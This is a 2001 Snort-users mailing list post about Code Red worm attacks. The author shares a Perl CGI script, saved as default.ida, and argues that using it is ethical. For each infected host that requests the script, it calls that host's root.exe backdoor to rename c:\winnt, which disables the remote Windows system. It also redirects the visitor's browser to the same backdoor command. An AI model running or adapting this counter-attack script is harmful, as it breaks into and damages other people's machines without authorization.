Snort mailing list archives
RE: Code Red attacks
From: "F.M. Taylor" <root () uranium indstate edu>
Date: Tue, 18 Sep 2001 15:01:31 -0500 (EST)
This is a "default.ida" script that I am using on a server somewhere. It seems to be working, at least some of the time. Ethical?? Well, it is a script, on a server that I own, and the only way it will do anything is if you try to access it. It doesn't activly look for anything, it just waits for a service request, and then performs the requested service. If you don't want this service, don't request it. If there is a better way to deliver this service after it has been requested (more elegant code), let me know. root@www:/htdocs# cat default.ida #!/usr/bin/perl # $ipAddress = $ENV{'REMOTE_ADDR'}; # $newUrl = $ipAddress."/scripts/root.exe?ren+c:\\winnt+c:\\codered\"; # system("TERM=vt100;export TERM;lynx \'http://$ipAddress/scripts/root.exe?ren+c:\\winnt+c:\\codered\' >>codered.txt"); # print "Content-type: text/html\n\n"; # print "<HTML><HEAD>"; print "<META HTTP-EQUIV=\"Refresh\" CONTENT=\"0;url=http://$newUrl\">"; print "</HEAD><BODY></BODY>"; print "</HTML>"; # _______________________________________________ Snort-users mailing list Snort-users () lists sourceforge net Go to this URL to change user options or unsubscribe: https://lists.sourceforge.net/lists/listinfo/snort-users Snort-users list archive: http://www.geocrawler.com/redir-sf.php3?list=snort-users
Current thread:
- Code Red attacks Peter Borner (Sep 17)
- Re: Code Red attacks Gordon Ewasiuk (Sep 17)
- RE: Code Red attacks Jason Withrow (Sep 17)
- RE: Code Red attacks Gordon Ewasiuk (Sep 17)
- RE: Code Red attacks Jason Withrow (Sep 17)
- RE: Code Red attacks Erek Adams (Sep 17)
- RE: Code Red attacks Randy Bradley (Sep 18)
- RE: Code Red attacks F.M. Taylor (Sep 18)
- Re: Code Red attacks Alec Waters (Sep 18)
- RE: Code Red attacks Erek Adams (Sep 18)
- RE: Code Red attacks Adrian Mink (Sep 18)
- RE: Code Red attacks Erek Adams (Sep 18)
- RE: Code Red attacks Jason Withrow (Sep 17)
- Re: Code Red attacks Gordon Ewasiuk (Sep 17)
- RE: Code Red attacks Gordon Ewasiuk (Sep 17)
- RE: Code Red attacks Jason Withrow (Sep 17)
- <Possible follow-ups>
- RE: Code Red attacks Greg Wright (Sep 17)
- RE: Code Red attacks Jason Withrow (Sep 17)
- RE: Code Red attacks Jason Withrow (Sep 17)
- RE: Code Red attacks Jason Withrow (Sep 17)
- RE: Code Red attacks Jason Withrow (Sep 17)